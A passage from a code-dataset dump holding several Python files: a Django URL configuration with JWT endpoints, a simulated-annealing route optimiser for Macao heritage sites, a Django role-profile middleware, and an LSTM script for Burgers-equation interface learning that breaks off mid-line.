settings\nfrom django.conf.urls import url, include\nfrom rest_framework import routers\nfrom rest_framework_jwt.views import obtain_jwt_token, refresh_jwt_token, verify_jwt_token\n\nfrom yaapi import views as yaapi_view\nfrom yacommon import views as yacommon_view\n\nrouter = routers.DefaultRouter()\n\nurlpatterns = [\n    url(r'account/api-auth', include('rest_framework.urls', namespace='rest_framework')),\n    url(r'account/api-token-auth', obtain_jwt_token),\n    url(r'account/api-token-refresh', refresh_jwt_token),\n    url(r'account/api-token-verify', verify_jwt_token),\n    url(r'system/info', yacommon_view.SystemInfo.as_view(), name='system_info'),\n    url(r'blog/resume', yacommon_view.ResumeInfo.as_view(), name='resume_info'),\n    url(r\"^\", include(router.urls)),\n]\n\nif settings.DEBUG:\n    # This allows the error pages to be debugged during development, just visit\n    # these url in browser to see how these error pages look like.\n    urlpatterns += [\n        url(r'all', yaapi_view.APIRootView.as_view(), name='all_api'),\n    ]\n", "sub_path": "yadjangoweb/yaapi/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1059, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", 
"pt": "12", "api": [{"api_name": "rest_framework.routers.DefaultRouter", "line_number": 9, "usage_type": "call"}, {"api_name": "rest_framework.routers", "line_number": 9, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 12, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 12, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 13, "usage_type": "call"}, {"api_name": "rest_framework_jwt.views.obtain_jwt_token", "line_number": 13, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}, {"api_name": "rest_framework_jwt.views.refresh_jwt_token", "line_number": 14, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "rest_framework_jwt.views.verify_jwt_token", "line_number": 15, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 16, "usage_type": "call"}, {"api_name": "yacommon.views.SystemInfo.as_view", "line_number": 16, "usage_type": "call"}, {"api_name": "yacommon.views.SystemInfo", "line_number": 16, "usage_type": "attribute"}, {"api_name": "yacommon.views", "line_number": 16, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 17, "usage_type": "call"}, {"api_name": "yacommon.views.ResumeInfo.as_view", "line_number": 17, "usage_type": "call"}, {"api_name": "yacommon.views.ResumeInfo", "line_number": 17, "usage_type": "attribute"}, {"api_name": "yacommon.views", "line_number": 17, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 18, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 18, "usage_type": "call"}, {"api_name": "django.conf.settings.DEBUG", "line_number": 21, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 21, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 25, "usage_type": "call"}, {"api_name": "yaapi.views.APIRootView.as_view", "line_number": 25, "usage_type": "call"}, {"api_name": "yaapi.views.APIRootView", "line_number": 25, "usage_type": "attribute"}, {"api_name": "yaapi.views", "line_number": 25, "usage_type": "name"}]} {"seq_id": "494041862", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on \n@author: weishan_lee\n\nSight-seeing order of Macao World Heritage Sites\nCase 2: Travel distance or time for pairs of cities recorded in the following csv files: \n (1) carTime.csv records time required for driving a car.\n (2) busTime.csv records time required for taking a bus.\n (3) pedestrianTime.csv records time required by walking between a pair of cities.\n (4) carDistance.csv records distance between a pair of sites by car.\n (5) pedestrianDistance.csv records distance between a pair of sites by foot.\n The optimal route is found based on the Simulated Annealing and Metropolis Algorithm. \nVersion 3_2: 1. Write to log.txt automatically.\n 2. Add funcion definition plotRoute\n 3. 
Modify function distance\n\"\"\"\nfrom math import exp\nimport numpy as np\nimport random as rand\nfrom vpython import * \nimport pandas as pd\nfrom datetime import datetime\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import AutoMinorLocator\nfrom sklearn import preprocessing\nmin_max_scaler = preprocessing.MinMaxScaler()\nimport sys\nimport os.path\n\n## Function Definitions\n\n# Function to calculate the updated total distance or time of the tour\ndef distanceUpdate(i, j, oldScore, randomList, rCoor):\n s = oldScore\n lList = len(randomList)\n\n if abs(i-j)==1:\n if ij\n if j == 0: \n jF = randomList[-1]\n else:\n jF = randomList[j-1]\n \n jC = randomList[j]\n jN = randomList[j+1]\n \n iF = randomList[i-1]\n iC = randomList[i]\n if i == lList-1: \n iN = randomList[0]\n else:\n iN = randomList[i+1] \n \n if jC!=iF or jN!=iC: print(\"WRONG! jC!=iF or jN!=iC! LINE 78\")\n s = s - rCoor[jF,jC] - rCoor[jC,jN] - rCoor[iC,iN]\n s = s + rCoor[jF,iC] + rCoor[iC,jC] + rCoor[jC,iN]\n else:\n \n if i == 0: \n iF = randomList[-1]\n else:\n iF = randomList[i-1]\n \n iC = randomList[i]\n \n if i == lList-1: \n iN = randomList[0]\n else:\n iN = randomList[i+1]\n \n if j == 0: \n jF = randomList[-1]\n else:\n jF = randomList[j-1]\n \n jC = randomList[j]\n if j == lList-1: \n jN = randomList[0]\n else:\n jN = randomList[j+1]\n \n s = s - rCoor[iF,iC] - rCoor[iC,iN] - rCoor[jF,jC] - rCoor[jC,jN]\n s = s + rCoor[iF,jC] + rCoor[jC,iN] + rCoor[jF,iC] + rCoor[iC,jN] \n return s\n\n# Function to calculate the initial total distance or time of the tour\ndef distance(randomList, rCoor):\n s = 0.0\n for i in range(N):\n j = randomList[i-1]\n k = randomList[i]\n s += rCoor[j,k]\n return s\n\n# output of the score (distance vs time steps)\ndef outPutScrVSTime(tRecord, scoreRecord):\n data = {'timeStep': tRecord,'score':scoreRecord}\n dfCSV = pd.DataFrame(data)\n dfCSV_file = open('./scoreVSTime.csv','w',newline='') \n dfCSV.to_csv(dfCSV_file, sep=',', encoding='utf-8',index=False)\n dfCSV_file.close()\n \ndef outPutSitesOrder(randomList):\n ## Write randomList back to cities datafram\n \n sites[\"sitesOrder\"] = randomList\n \n sitesOrder = pd.DataFrame(columns = ['sitesId', 'Name'])\n sitesOrder_file = open(\"./sightSeeingOrder.csv\",'w',newline='') \n\n for i in range(N+1):\n if i == N:\n integer = np.uint32(sites.loc[0].sitesOrder)\n sitesOrder.loc[i] = integer, sites.loc[integer].Name\n else:\n integer = np.uint32(sites.loc[i].sitesOrder)\n sitesOrder.loc[i] = integer, sites.loc[integer].Name\n\n sitesOrder.to_csv(sitesOrder_file, sep=',', encoding='utf-8', index=False) \n sitesOrder_file.close()\n\ndef plotRoute(rr, sites):\n x = []\n y = []\n n = [int(num) for num in rCoor[:,3].tolist()]\n\n for i in range(N+1):\n if i == N:\n x.append( sites.loc[n[0]].X )\n y.append( sites.loc[n[0]].Y )\n else:\n x.append( sites.loc[n[i]].X )\n y.append( sites.loc[n[i]].Y )\n fig, ax = plt.subplots()\n ax.title.set_text(\"Optimal Tour Path\")\n\n ax.plot(x,y,'k-')\n ax.scatter(x[0],y[0],c='blue')\n ax.scatter(x[1:-1],y[1:-1],c='red')\n\n for i, txt in enumerate(n):\n ax.annotate(txt, (x[i], y[i]))\n\n ax.set_xlabel(\"Longitude\",size = 12)\n ax.set_ylabel(\"Latitude\",size = 12)\n ax.ticklabel_format(useOffset=False)\n plt.grid(True)\n plt.savefig(\"optimalTourPath.eps\") \n \ndef writeLog(msg):\n with open('log.txt', 'a+') as the_file:\n print(msg)\n the_file.write(msg)\n\nimport os, psutil\n# If previous log.txt file exists, remove it.\nif os.path.exists(\"./log.txt\"):\n os.remove(\"./log.txt\")\n \ndef 
cpu_stats():\n pid = os.getpid()\n py = psutil.Process(pid)\n memory_use = py.memory_info()[0] / 2. ** 30\n return 'Memory: ' + str(np.round(memory_use, 2)) + 'GB\\t'\n\n########################## Parameters and Options ############################\n## If you need animation?\nanimation = False\n## If you need to record score vs time step?\nscoreVsTime = False\n\n## Set up Case and load matrix of time or distance for each pair of cities.\n# case = 1: car Time. \n# case = 2: bus time. Some pair of route may be replaced by pedestrian time.\n# case = 3: pedestrin time.\n# case = 4: car distance.\n# cas3 = 5: pedestrian distance.\ncase = 4\n\n## Parameters for Simulated annealing\nTmax = 1.0\nTmin = 1e-2\ntau = 1e3\ntargetScore = 13.916 # carTime 78. busTime = 117. pedestrianTime = 115.\n # carDistance 13.916. pedestrianDistance = 7.844\n###############################################################################\n\n# Load world heritage sites locations\nsites = pd.read_csv(\"./macauWHSLoc.csv\")\nR = 0.02\nN = sites.shape[0]\n\n## normalize data\n\nsites['normX'] = min_max_scaler.fit_transform(sites.X.values.reshape(-1, 1))\nsites['normY'] = min_max_scaler.fit_transform(sites.Y.values.reshape(-1, 1))\n\nif case == 1:\n matrix_ = pd.read_csv(\"./carTime.csv\")\nelif case == 2:\n matrix_ = pd.read_csv(\"./busTime.csv\")\nelif case == 3:\n matrix_ = pd.read_csv(\"./pedestrianTime.csv\")\nelif case == 4:\n matrix_ = pd.read_csv(\"./carDistance.csv\")\nelse:\n matrix_ = pd.read_csv(\"./pedestrianDistance.csv\")\n\nN = 25 # number of sites\n\n# Set up the initial configuration\nrandomList = rand.sample(range(0, N), N)\n\n## Change sites dataframe to rCoor array \n# rCoor could mean the time or distance of a pair of cities.\n\nrCoor = np.empty([N,N])\nfor i in range(N):\n for j in range(N):\n rCoor[i,j] = matrix_.iloc[i][j] # matrix value\n\n## Change sites dataframe to rPlot array\nrPlot = np.empty([N+1,4])\nfor i in range(N):\n j = randomList[i]\n rPlot[i,0] = sites.normX[j]\n rPlot[i,1] = sites.normY[j]\n rPlot[i,2] = 0.0\n rPlot[i,3] = sites.SiteId[j]\n \n# Add one more ending site which is identical the starting site\nrPlot[N,0] = rPlot[0,0]\nrPlot[N,1] = rPlot[0,1]\nrPlot[N,2] = rPlot[0,2]\nrPlot[N,3] = rPlot[0,3]\n\n#Calculate the initial distance\n\nscore = distance(randomList, rCoor)\ninitScore = score\nminScore = initScore\nmsg = \"Initial score = {:.5f}\\n\".format(initScore)\n\noldScore = score\n\n# Write the log.txt file for the first time.\nwriteLog(msg)\n\n# Set up the graphics\nif animation == True:\n scene = canvas(center=vector(0.5,0.5,0.0), background = color.white)\n for i in range(N):\n if i == 0:\n sphere(pos=vector(rPlot[i,0],rPlot[i,1],0.0),radius=R,color = color.blue)\n else:\n sphere(pos=vector(rPlot[i,0],rPlot[i,1],0.0),radius=R,color = color.black)\n l = curve(pos=rPlot.tolist(),radius=R/4,color = color.red)\n\n## Simulated annealing\n## Main loop\n\ntRecord = []\nscoreRecord = []\n\nt0=0 # setting up the beginning of the time \"lump\"\ntRecord += [0]\nscoreRecord += [score]\n\nfirstInitial = True\n\nwhile (score>targetScore):\n \n if firstInitial == False: \n # Set up another initial configuration\n randomList = rand.sample(range(0, N), N)\n\n ## Change sites dataframe to rCoor array\n rCoor = np.empty([N,N])\n for i in range(N):\n for j in range(N):\n rCoor[i,j] = matrix_.iloc[i][j] \n \n #Calculate the initial distance\n score = distance(randomList, rCoor)\n\n ## Change sites dataframe to rPlot array\n rPlot = np.empty([N+1,4])\n for i in range(N):\n j = 
randomList[i]\n rPlot[i,0] = sites.normX[j]\n rPlot[i,1] = sites.normY[j]\n rPlot[i,2] = 0.0\n rPlot[i,3] = sites.SiteId[j]\n \n # Add one more ending site which is identical the starting site\n rPlot[N,0] = rPlot[0,0]\n rPlot[N,1] = rPlot[0,1]\n rPlot[N,2] = rPlot[0,2]\n rPlot[N,3] = rPlot[0,3]\n \n if animation == True:\n # Set up the graphics\n scene.delete()\n scene = canvas(center=vector(0.5,0.5,0.0), background = color.white)\n for i in range(N):\n if i == 0:\n sphere(pos=vector(rPlot[i,0],rPlot[i,1],0.0),radius=R,color = color.blue)\n else:\n sphere(pos=vector(rPlot[i,0],rPlot[i,1],0.0),radius=R,color = color.black)\n l = curve(pos=rPlot.tolist(),radius=R/4,color = color.red)\n\n T = Tmax\n t = 0\n while (T>Tmin):\n # Cooling\n t += 1\n T = Tmax*exp(-t/tau)\n\n # Choose two sites to swap and make sure they are distinct\n i,j = rand.randrange(1,N),rand.randrange(1,N)\n while i==j:\n i,j = rand.randrange(1,N),rand.randrange(1,N)\n \n # Swap them and calculate the change in score\n oldScore = score\n \n rPlot[i,0],rPlot[j,0] = rPlot[j,0],rPlot[i,0]\n rPlot[i,1],rPlot[j,1] = rPlot[j,1],rPlot[i,1]\n rPlot[i,2],rPlot[j,2] = rPlot[j,2],rPlot[i,2]\n rPlot[i,3],rPlot[j,3] = rPlot[j,3],rPlot[i,3]\n \n score = distanceUpdate(i,j,oldScore,randomList,rCoor)\n \n randomList[i], randomList[j] = randomList[j], randomList[i]\n scoreCheck = distance(randomList, rCoor)\n if abs(score-scoreCheck)>1e-4:\n randomList[i], randomList[j] = randomList[j], randomList[i]\n msg = \"Score Error! Line 359.\\n\" +\\\n \"i = {}, j = {}, randomList[i] = {}, randomList[j] = {}\\n\".format(i,j,randomList[i],randomList[j]) +\\\n \"score = {}, scoreCheck = {}\".format(score,scoreCheck)\n writeLog(msg)\n sys.exit()\n \n deltaScore = score - oldScore\n\n try:\n ans = np.exp(-deltaScore/T)\n except OverflowError:\n if -deltaScore/T > 0:\n ans = float('inf')\n else:\n ans = 0.0\n \n # If the move is rejected, swap them back again\n if rand.random() > ans:\n \n randomList[i], randomList[j] = randomList[j], randomList[i]\n \n rPlot[i,0],rPlot[j,0] = rPlot[j,0],rPlot[i,0]\n rPlot[i,1],rPlot[j,1] = rPlot[j,1],rPlot[i,1]\n rPlot[i,2],rPlot[j,2] = rPlot[j,2],rPlot[i,2]\n rPlot[i,3],rPlot[j,3] = rPlot[j,3],rPlot[i,3]\n score = oldScore\n if np.abs(score - distance(randomList, rCoor))>1e-5:\n msg = \"score: {}\".format(score)\n writeLog(msg)\n msg = \"distance: {}\".format(distance(randomList, rCoor))\n writeLog(msg)\n msg = \"Error Line 390\"\n writeLog(msg)\n sys.exit()\n \n if animation == True: \n # Update the visualization every 100 moves\n if t%100==0:\n rate(25)\n for i in range(N+1):\n pos = vector(rPlot[i,0],rPlot[i,1],0.0)\n l.modify(i,pos)\n \n if scoreVsTime == True:\n #if t%1==0:\n tRecord += [t0+t]\n scoreRecord += [score]\n \n #writeLog(cpu_stats())\n \n if score < minScore: \n minScore = score\n outPutScrVSTime(tRecord, scoreRecord)\n outPutSitesOrder(randomList)\n dt = datetime.now()\n msg = str(dt.year) + '/' + str(dt.month) + '/' + str(dt.day) + ' ' +\\\n str(dt.hour) + ':' + str(dt.minute) + ':' + str(dt.second) +'\\t'\n writeLog(msg)\n msg = \"Delta score = {:.5f}\\t\".format(deltaScore)\n writeLog(msg)\n msg = \"New score = {:.5f}\\n\".format(score)\n writeLog(msg) \n \n t0 = t0 + t # go to next time \"lump\"\n firstInitial = False\n# End of Main Loop\nif case == 1 or case == 2 or case == 3:\n msg = \"The initial total traveling time = {:.5f} min\\n\".format(initScore)\n writeLog(msg)\n msg = \"The optimal total traveling time = {:.5f} min\\n\".format(score)\n writeLog(msg)\nelse:\n msg = \"The initial total 
traveling distance = {:.5f} km\\n\".format(initScore)\n writeLog(msg)\n msg = \"The optimal total traveling distance = {:.5f} km\\n\".format(score)\n writeLog(msg)\n\n# plot score vs t\nplt.figure()\nplt.title(\"traveling time vs Iteration\")\nax = plt.gca()\nenVsTime = pd.read_csv( \"./scoreVSTime.csv\") \nplt.plot(enVsTime.timeStep,enVsTime.score,'k-')\nplt.minorticks_on()\nminorLocatorX = AutoMinorLocator(5) # number of minor intervals per major # inteval\nminorLocatorY = AutoMinorLocator(5)\nax.set_xlabel(\"Iteration\",size = 16)\nif case == 1 or case == 2 or case == 3:\n ax.set_ylabel(\"Total traveling time (min)\",size = 16)\nelse:\n ax.set_ylabel(\"Total traveling distance (km)\",size = 16)\nax.xaxis.set_minor_locator(minorLocatorX) # add minor ticks on x axis\nax.yaxis.set_minor_locator(minorLocatorY) # add minor ticks on y axis\nplt.grid(True)\n#plt.xlim(-20000,500000)\nplt.savefig(\"scoreVsTime.eps\")\nplt.show() \n\nscoreCheck = distance(randomList, rCoor)\nif case == 1 or case == 2 or case == 3:\n msg = \"The checked optimal total traveling time = {:.5f} min\".format(scoreCheck)\n writeLog(msg)\nelse:\n msg = \"The checked optimal total traveling distance = {:.5f} km\".format(scoreCheck)\n writeLog(msg)", "sub_path": "SAMAV3_2.py", "file_name": "SAMAV3_2.py", "file_ext": "py", "file_size_in_byte": 14926, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 27, "usage_type": "call"}, {"api_name": "sklearn.preprocessing", "line_number": 27, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 119, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.uint32", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.uint32", "line_number": 137, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 155, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 155, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 168, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 168, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 169, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 169, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 178, "usage_type": "call"}, {"api_name": "os.path", "line_number": 178, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 179, "usage_type": "call"}, {"api_name": "os.getpid", "line_number": 182, "usage_type": "call"}, {"api_name": "psutil.Process", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 185, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 210, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 220, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 222, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 224, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 226, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 228, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 233, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 238, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 244, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 296, 
"usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 299, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 308, "usage_type": "call"}, {"api_name": "math.exp", "line_number": 338, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 341, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 343, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 363, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 368, "usage_type": "call"}, {"api_name": "random.random", "line_number": 376, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 385, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 392, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 413, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 413, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 437, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 437, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 438, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 438, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 439, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 439, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 440, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 441, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 441, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.minorticks_on", "line_number": 442, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 442, "usage_type": "name"}, {"api_name": "matplotlib.ticker.AutoMinorLocator", "line_number": 443, "usage_type": "call"}, {"api_name": "matplotlib.ticker.AutoMinorLocator", "line_number": 444, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 452, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 452, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 454, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 454, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 455, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 455, "usage_type": "name"}]} {"seq_id": "180715711", "text": "from django.conf import settings\n\nfrom account.models import AdminProfile, EmployerProfile, StudentProfile\n\n__all__ = (\n 'UserProfileMiddleware'\n)\n\n\nclass UserProfileMiddleware(object):\n\n def process_request(self, request):\n \"\"\"Add related profile of user to request object\"\"\"\n if request.user.is_authenticated():\n role_type = request.session.get('role_type', None)\n\n if role_type == settings.ROLE_TYPES.get('admin'):\n request.user_profile = AdminProfile.objects.get(user_id=request.user.id)\n\n elif role_type == settings.ROLE_TYPES.get('employer'):\n request.user_profile = EmployerProfile.objects.get(user_id=request.user.id)\n\n elif role_type == settings.ROLE_TYPES.get('student'):\n request.user_profile = StudentProfile.objects.get(user_id=request.user.id)\n\n request.session['role_type'] = role_type\n\n return", "sub_path": "account/middlewares.py", "file_name": "middlewares.py", "file_ext": "py", "file_size_in_byte": 936, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": 
"django.conf.settings.ROLE_TYPES.get", "line_number": 17, "usage_type": "call"}, {"api_name": "django.conf.settings.ROLE_TYPES", "line_number": 17, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 17, "usage_type": "name"}, {"api_name": "account.models.AdminProfile.objects.get", "line_number": 18, "usage_type": "call"}, {"api_name": "account.models.AdminProfile.objects", "line_number": 18, "usage_type": "attribute"}, {"api_name": "account.models.AdminProfile", "line_number": 18, "usage_type": "name"}, {"api_name": "django.conf.settings.ROLE_TYPES.get", "line_number": 20, "usage_type": "call"}, {"api_name": "django.conf.settings.ROLE_TYPES", "line_number": 20, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 20, "usage_type": "name"}, {"api_name": "account.models.EmployerProfile.objects.get", "line_number": 21, "usage_type": "call"}, {"api_name": "account.models.EmployerProfile.objects", "line_number": 21, "usage_type": "attribute"}, {"api_name": "account.models.EmployerProfile", "line_number": 21, "usage_type": "name"}, {"api_name": "django.conf.settings.ROLE_TYPES.get", "line_number": 23, "usage_type": "call"}, {"api_name": "django.conf.settings.ROLE_TYPES", "line_number": 23, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 23, "usage_type": "name"}, {"api_name": "account.models.StudentProfile.objects.get", "line_number": 24, "usage_type": "call"}, {"api_name": "account.models.StudentProfile.objects", "line_number": 24, "usage_type": "attribute"}, {"api_name": "account.models.StudentProfile", "line_number": 24, "usage_type": "name"}]} {"seq_id": "308366200", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nLearning from past (LP) interface learning for 1D Burgers problem with an \ninitial condition of square wave. \nLeft zone is truncated and compensated for by an LSTM model.\n\nThis correpsonds to Example 1 for the following paper:\n \"Interface learning of multiphysics and multiscale systems\",\n Physical Review E, 2020\n \nFor questions, comments, or suggestions, please contact Shady Ahmed,\nPhD candidate, School of Mechanical and Aerospace Engineering, \nOklahoma State University. 
@ shady.ahmed@okstate.edu\nlast checked: 11/10/2020\n\"\"\"\n\n#%% Import libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom numpy import linalg as LA\nfrom scipy.linalg import block_diag\n\nfrom numpy.random import seed\nseed(0)\n\nimport tensorflow as tf\ntf.random.set_seed(0)\n\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.layers import LSTM\nfrom tensorflow.keras.models import load_model\n\nfrom sklearn.preprocessing import MinMaxScaler\nimport joblib\n\nimport os\nimport sys\n#%% Define Functions\n\n#-----------------------------------------------------------------------------!\n#compute rhs for numerical solutions\n# r = -u*u' + nu*u''\n#-----------------------------------------------------------------------------!\ndef rhsR(nx,dx,nu1,nu2,g1,g2,nxb,u):\n r = np.zeros(nx-nxb+1)\n r[1:nx-nxb] =(nu2/(dx*dx))*(u[2:nx-nxb+1] -2.0*u[1:nx-nxb] +u[0:nx-nxb-1])\\\n - g2*u[1:nx-nxb] \\\n -(1.0/3.0)*(u[2:nx-nxb+1]+u[0:nx-nxb-1]+u[1:nx-nxb])\\\n *(u[2:nx-nxb+1]-u[0:nx-nxb-1])/(2.0*dx)\n return r\n\n#-----------------------------------------------------------------------------#\n# Neural network Routines\n#-----------------------------------------------------------------------------#\ndef create_training_data_lstm(features,labels, m, n, lookback):\n # m : number of snapshots \n # n: number of states\n ytrain = [labels[i,:] for i in range(lookback,m)]\n ytrain = np.array(ytrain) \n \n xtrain = np.zeros((m-lookback,lookback,n))\n for i in range(m-lookback):\n a = np.copy(features[i,:])\n for j in range(1,lookback):\n a = np.vstack((a,features[i+j,:]))\n xtrain[i,:,:] = a\n return xtrain , ytrain\n\n\n#%% Main program:\n \n# Inputs\nnx = 4*1024 #spatial resolution\nlx = 1.0 #spatial domain\ndx = lx/nx\nx = np.linspace(0, lx, nx+1)\n\nnu1 = 1e-2 #control dissipation\nnu2 = 1e-4 #control dissipation\ng1 = 0 #friction\ng2 = 1 #friction\n\ntm = 1 #maximum time\ndt = 2.5e-4 #solver timestep\nnt = round(tm/dt)\nt = np.linspace(0, tm, nt+1)\n\nns = 4000 #number of snapshots to save\nfreq = round(nt/ns)\n\n\ntraining = 'true'\n#%% Read data\nnpt = 3 #number of points in input\n\nuFOM = np.zeros((7,ns+1,nx+1))\nxi = np.zeros((7,ns+1,2*npt+1))\nyi = np.zeros((7,ns+1,1))\n\nfor ii in range(7):\n nxb= int((ii+1)*nx/8)\n data = np.load('./Data/uFOM_xb='+str(nxb/nx)+'_.npy')\n uFOM[ii,:,:] = data.T\n for jj in range(npt):\n xi[ii,:,jj] = data[nxb+jj,:].T\n xi[ii,:,npt+jj] = x[nxb+jj]\n \n xi[ii,:,-1] = t\n yi[ii,:,0] = data[nxb,:]\n\n#%% Divide into training and testing\n#uTrain = uFOM[[0,2,4,6],:,:]\n#uTest = uFOM[[1,3,5],:,:] \n\nxTrain = xi[[0,2,4,6],:,:]\nyTrain = yi[[0,2,4,6],:,:]\n\nlookback = 1\n#%%\nif training == 'true': \n \n for i in range(4):\n features = xTrain[i,:,:] \n labels = yTrain[i,:,:]\n xt, yt = create_training_data_lstm(features, labels, features.shape[0], \\\n features.shape[1], lookback)\n if i == 0:\n xtrain = xt\n ytrain = yt\n else:\n xtrain = np.vstack((xtrain,xt))\n ytrain = np.vstack((ytrain,yt))\n \n #%% \n # Scaling data\n m,n = ytrain.shape # m is number of training samples, n is number of output features\n scalerOut = MinMaxScaler(feature_range=(-1,1))\n scalerOut = scalerOut.fit(ytrain)\n ytrain = scalerOut.transform(ytrain)\n \n for k in range(lookback):\n if k == 0:\n tmp = xtrain[:,k,:]\n else:\n tmp = np.vstack([tmp,xtrain[:,k,:]])\n \n scalerIn = MinMaxScaler(feature_range=(-1,1))\n scalerIn = scalerIn.fit(tmp)\n for i in range(m):\n xtrain[i,:,:] = scalerIn.transform(xtrain[i,:,:])\n \n 
#%%\n # Shuffling data\n perm = np.random.permutation(m)\n xtrain = xtrain[perm,:,:]\n ytrain = ytrain[perm,:]\n \n # create folder\n if os.path.isdir(\"./LSTM Model\"):\n print('LSTM models folder already exists')\n else: \n print('Creating LSTM models folder')\n os.makedirs(\"./LSTM Model\")\n \n # Removing old models\n model_name = 'LSTM Model/LSTM_LP_'+str(npt)+'.h5'\n if os.path.isfile(model_name):\n os.remove(model_name)\n \n # create the LSTM architecture\n model = Sequential()\n model.add(LSTM(20, input_shape=(lookback, features.shape[1]), return_sequences=True, activation='tanh'))\n #model.add(LSTM(40, input_shape=(lookback, features.shape[1]), return_sequences=True, activation='tanh'))\n #model.add(LSTM(40, input_shape=(lookback, features.shape[1]), return_sequences=True, activation='tanh'))\n model.add(LSTM(20, input_shape=(lookback, features.shape[1]), activation='tanh'))\n model.add(Dense(labels.shape[1]))\n \n # compile model\n model.compile(loss='mean_squared_error', optimizer='adam', metrics=['mse'])\n \n # run the model\n history = model.fit(xtrain, ytrain, epochs=200, batch_size=64, validation_split=0.25)\n \n # evaluate the model\n scores = model.evaluate(xtrain, ytrain, verbose=0)\n print(\"%s: %.2f%%\" % (model.metrics_names[1], scores[1]*100))\n \n loss = history.history['loss']\n val_loss = history.history['val_loss']\n \n plt.figure()\n epochs = range(1, len(loss) + 1)\n plt.semilogy(epochs, loss, 'b', label='Training loss')\n plt.semilogy(epochs, val_loss, 'r', label='Validation loss')\n plt.title('Training and validation loss')\n plt.legend()\n filename = 'LSTM Model/LP_loss.png'\n plt.savefig(filename, dpi = 200)\n plt.show()\n \n \n # Save the model\n model.save(model_name)\n \n # Save the scales\n filename = 'LSTM Model/LP_input_scaler_'+str(npt)+'.save'\n joblib.dump(scalerIn,filename) \n filename = 'LSTM Model/LP_output_scaler_'+str(npt)+'.save'\n joblib.dump(scalerOut,filename) \n\n\n#%% Testing\nmodel_name = 'LSTM Model/LSTM_LP_'+str(npt)+'.h5'\nmodel = load_model(model_name) \n\n# load scales\nfilename = 'LSTM Model/LP_input_scaler_'+str(npt)+'.save'\nscalerIn = 